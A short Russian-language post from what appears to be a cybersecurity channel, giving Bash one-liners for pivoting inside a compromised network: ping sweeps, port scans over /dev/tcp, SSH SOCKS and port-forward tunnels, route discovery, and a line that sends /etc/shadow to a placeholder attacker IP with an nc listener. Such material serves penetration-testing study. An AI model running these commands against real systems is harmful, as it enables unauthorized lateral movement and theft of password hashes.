ZeroDay | Кибербезопасность
Bash для пивотинга в сети
👋 Приветствую в мире цифровой безопасности!
Попали на машину внутри сети. Дальше нужно двигаться, но инструментов нет. Разберём, что можно сделать чистым Bash.
⏺ Находим соседей без nmap:
for ip in 10.10.10.{1..254}; do ping -c1 -W1 $ip &>/dev/null && echo "$ip" & done; wait
Фоновые процессы ускоряют скан. На /24 уходит секунд 10-15.
⏺ Проверяем порты через /dev/tcp:
for h in $(cat live.txt); do for p in 22 80 443 445 3389 8080; do (echo >/dev/tcp/$h/$p) &>/dev/null && echo "$h:$p"; done; done
Никаких бинарей. Работает везде, где есть Bash.
⏺Туннель через SSH без ProxyChains:
ssh -D 1080 -N -f user@pivot_host
SOCKS5 на localhost:1080. Если есть SSH на промежуточной машине - этого достаточно для дальнейшего движения.
⏺ Проброс порта через SSH:
ssh -L 5432:db_host:5432 -N user@pivot_host
База данных во внутренней сети становится доступна на локальном 5432. Полезно, когда нужен прямой доступ к сервису.
⏺Передача файлов без curl и wget:
cat /etc/shadow > /dev/tcp/АТАКУЮЩИЙ_IP/4444
На принимающей стороне: nc -lvnp 4444 > shadow. Чистый Bash, никаких зависимостей.
⏺Ищем маршруты во внутренние подсети:
ip route; cat /etc/hosts; arp -n | awk '{print $1}'
Часто на пивот-хосте уже есть маршруты в нужные сегменты. Смотрим перед тем, как делать что-то сложнее.
Zeroday - https://max.ru/cybersec_academy